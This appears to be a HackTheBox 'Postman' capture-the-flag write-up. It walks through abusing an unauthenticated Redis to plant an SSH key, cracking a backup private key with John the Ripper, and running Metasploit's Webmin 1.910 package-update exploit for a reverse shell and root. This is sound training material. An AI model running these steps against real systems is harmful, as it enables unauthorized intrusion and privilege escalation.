HackTheBox - Postman 📮✉️

HackTheBoxPenTesting
, , , , ,

HackTheBox-Postman

Quick Summary

→ This easy machine is very fit to all beginners to learn the basic of Penetration Testing. The machine have a vulnerable software – Redis.
Redis is unprotected without a password set up, and so forth. The simplest thing you can do in such a case, is to write random file such as SSH keys which i’ll use to get in into the machine. After getting the shell, there’s SSH key for user Matt. The machine is very straightforward to the root after you get the credentials of the user and use it for another vulnerability – CVE Webmin 1.910.

Penetration Testing Methodologies

  1. Network Scanning

    → Nmap scan

    → discover open ports and what services are running

  2. Enumeration

    → Browsing the HTTP Service on different ports

    → Bruteforce the Web page directories

    → Check the software vulnerabilities

  3. Post - Exploitation

    → Check if we can inject or put some file inside in the Redis

    → The goal is to transfer SSH keys

    → Get in into redis shell

  4. Exploitation

    → Find some interesting things using LinEnum.sh that can use for Exploitation

    → Get the backup SSH key of a user

    → Use the credentials for CVE Webmin 1.910

    → Get the root shell

Network Scanning

Walkthrough

→ First, I run the Nmap to scan the target and get information about the various services that are running on the target machine. I use

  • -sV      ⇒ Probe open ports to determine service/version info

  • -sC      ⇒ equivalent to —script=default

  • -T 0-5   ⇒ Set timing template - higher is faster (less accurate)

  • -p-      ⇒ Scan all 65535 ports

  • -oN      ⇒ to save our scan results to a text file

# bash
nmap -sV -sC -T4 -p- 10.10.10.154 -oN nmap-postman

Nmap results

So there’s port open.

  • 22 ⇒ running on OpenSSH 7.6p1
  • 80 ⇒ running on Apache/2.24.49
  • 6379 ⇒ running on Redis key-value version 4.0.9
  • 10000 ⇒ running on MiniServ 1.910 (Webmin httpd)

HackTheBox-Postman/nmap-postman.png

Enumeration

I visited the web page in port 80 and there’s nothing interesting stuffs here except the Postman@htb so added it into my /etc/hosts/

# bash

10.10.10.160	postman.htb

HackTheBox-Postman/postman-webpage.gif

Scan the Web directories

So, since I don’t have any clue what is on the Web page, I use dirsearch Web path scanner to find some stuffs with the following command.

# bash

root in htb/boxes/postman 
❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.160" -e asd -x 403,404 --simple-report=postman-directories

HackTheBox-Postman/postman-dirsearch.png

So I have this following directories, everything is a normal web directories except on the /upload/ directory which caught my attention.

# bash

[07:32:03] 301 -  310B  - /css  ->  http://10.10.10.160/css/                                                      
[07:32:18] 301 -  312B  - /fonts  ->  http://10.10.10.160/fonts/                                      
[07:32:24] 301 -  313B  - /images  ->  http://10.10.10.160/images/     
[07:32:26] 200 -    4KB - /index.html                                                                          
[07:32:29] 301 -  309B  - /js  ->  http://10.10.10.160/js/                                              
[07:33:26] 301 -  313B  - /upload  ->  http://10.10.10.160/upload/

[07:33:26] 200 -    8KB - /upload/

Going to the /upload/ directory we will see a lot of image there. I tried to look fo the interesting image’ but I realize that this one is a rabbit hole so moved on and go the next phase.

Upload page

HackTheBox-Postman/postman-upload.png

Webmin 1.910

Next is to visit the Port 10000 which holding an HTTP service – Miniserv 1.910 (Webmin httpd)

HackTheBox-Postman/postman-webmin.png

I search the webmin version that runs on the machine to look if there’s an existing exploit and there is.

Webmin Package Updates Remote Code Execution.

→ Description: This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. Any user authorized to the “Package Updates” module can execute arbitrary commands with root privileges.

Since I don’t have any credentials that will use on that exploits, i will leave this for a while and moved on to the next phase of hunting.

Post Exploitation

Next is to try Redis that appear on my nmap scan.
→ Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker.

I used the redis-tools package to communicate to the service of Redis. The existing vulnerability in version 4.0.9, you can interact redis without username and password.

So, to start let’s check if I can access the instance, which is a prerequisite:

Communicate with telnet

HackTheBox-Postman/postman-telnet.png

Works, Redis it is unprotected without a password set up.

Next is to try the redis-cli to look if i’ll got something.

# bash

root in htb/boxes/postman 
❯ redis-cli -h 10.10.10.160
10.10.10.160:6379> get s-key
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0+WZO2fM8J6HgUa5kgmE4xQwjMbiWFUYOND+7Qpm6a4XmJM6NABlIOUTe5FnUx+KZmcHlAenOqVdDPsa9rE1G9vZVi8OSFNJ6xplYzyFD9pzyFJ+e2Zz6c6RD2uptE9meJAiE+RQFpNM5TqZgpmlYGG1fi/2Pgtud7I0Lj95S/lRWqtvVN6uK44lKWru+YYwGtA+3unG+0lgRJrC+58+VFV/Cm54ZvJUd/I/4Q08ij6qx4AD1Y0xQqWKoDZMvb0kluzIRcvaYrTEKaFhxVpliVlqP6U3HFgeVZ2AJB redis@server\n\n\n\n"
10.10.10.160:6379>

By using get s-key command inside redis it shows that there’s an existing ssh key that use for authentication. As a redis user shell I can write something in the database to a file with SAVE command. So I was thinking if I can put mine to get in.

Inject SSH Keys

Since the Redis is not protected. I will try to write something into ~/.ssh/authorized_keys in order to gain access to shell. So i will generate my SSH Key first and save into my postman directory.

OPENSSH Key will not valid. To get this work I’ll need RSA PRIVATE Key using this line I can push my ssh-key into private key.

# bash

ssh-keygen -m PEM -t rsa -b 4096 -C bunny@lanaya

Generated SSH Key

HackTheBox-Postman/postman-rsa-keys.png

Now I’ve a key. My goal is to put it into the Redis server memory, and later to transfer it into a file, in a way that the resulting authorized_keys file is still a valid one.

So’ by following this method I will now put my generated ssh-key.

HackTheBox-Postman/postman-flushall.png

Now Let’s now put my SSH Key into the Redis.
Using redis-cli I can check, set a directory for redis and save.

HackTheBox-Postman/postman-config.png

I’ve successfully save my SSH key. Now I’ll try to login with ssh.

# bash

root in htb/boxes/postman 
❯ ssh -v -i id_rsa redis@10.10.10.160
OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d  10 Sep 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 10.10.10.160 [10.10.10.160] port 22.
debug1: Connection established.
debug1: identity file id_rsa type 0
debug1: identity file id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
debug1: match: OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
debug1: Authenticating to 10.10.10.160:22 as 'redis'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0
debug1: Host '10.10.10.160' is known and matches the ECDSA host key.
debug1: Found key in /root/.ssh/known_hosts:3
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: Will attempt key: id_rsa RSA SHA256:RHbmsaWNCcKp3yQZ5DzJzY7qtBWYIMl5z5h3BT1dbP8 explicit
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Offering public key: id_rsa RSA SHA256:RHbmsaWNCcKp3yQZ5DzJzY7qtBWYIMl5z5h3BT1dbP8 explicit
debug1: Server accepts key: id_rsa RSA SHA256:RHbmsaWNCcKp3yQZ5DzJzY7qtBWYIMl5z5h3BT1dbP8 explicit
debug1: Authentication succeeded (publickey).
Authenticated to 10.10.10.160 ([10.10.10.160]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending environment.
debug1: Sending env LANG = en_US.utf8
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Mar 15 00:54:05 2020 from 10.10.15.124
redis@Postman:~$ whoami
redis

It works! I’ve got now the initial shell.

Exploitation

Recon

By doing some Recon i’ll use LinEnum.sh – Scripted Local Linux Enumeration & Privilege Escalation Checks.
It will help to find weaknesses and save my time to do the Privilege Escalation, I’ll uploaded it into /tmp/ directories of redis and execute it, so:

HackTheBox-Postman/postman-linenum.png

At first it will show the system information of Postman machine.

Shell user

I see the user Matt and also my shell user as Redis.

HackTheBox-Postman/postman-users.png

Backup private SSH Key

Going deep of recon, there’s a file that caught my attention. Is a backup SSH key of some user. Base on the info that show’ it is owned by user Matt

HackTheBox-Postman/postman-private-keys.png

Going to the /opt/ directory, I’ll try to transfer id_rsa.bak into my machine but it seems not working, so I used cat to view the content of the file.

HackTheBox-Postman/postman-cat-keys.png

Cracking the HASH

I copy the content of id_rsa.bak into my machine and I use ssh2john to convert and crack it with John The Ripper

HackTheBox-Postman/postman-crack.png

Cracking this using John The Ripper.

HackTheBox-Postman/postman-crack-john.png

Just only 14 seconds. I’ve got now the password of Matt

# bash

password:   computer2008

Login as Matt

I may now able to login as Matt and get the user.txt

HackTheBox-Postman/postman-user.png

CVE Webmin 1.910

In the early stage of my Penetration Testing to this machine’ there’s an existing vulnerability – CVE Webmin 1.910 that need credentials. I’ll use metasploit to do the exploitation and pick the webmin_packageup_rce

HackTheBox-Postman/postman-msf.png

I will use the credentails for Matt and let’s see what will happen ;)

# metasploit

msf5 > exploit(linux/http/webmin_packageup_rce) > show options

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910

base on the options it requires – PASSWORD, RPORT is on default 10000, RHOSTS which is the victim IP (Postman), SSL (will set to true), and USERNAME so:

# metasploit

msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160
RHOSTS => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set SSL true
SSL => true
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
USERNAME => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.10.160
LHOST => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 10.10.15.124:4444 
[+] Session cookie: 6fda9f4ceb95660a3799aaf46bffea37
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.15.124:4444 -> 10.10.10.160:47708) at 2020-03-15 09:33:49 +0800

[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell

It works! And to upgrade my shell i use import pty using python:

# python

python -c 'import pty; pty.spawn("/bin/bash");'

Root

Very straightforward – Rooted! Now i can get the root.txt 

# bash

root@Postman:~# id
id
uid=0(root) gid=0(root) groups=0(root)

HackTheBox-Postman/postman-rooted.png

If you liked my writeup please leave a respect on my Profile

Payas0

Referrences:

Exploit Redis Server Article

Pentesting with Redis

Official Exploit of Webmin 1.910

How to get in into the machine with Redis Exploitation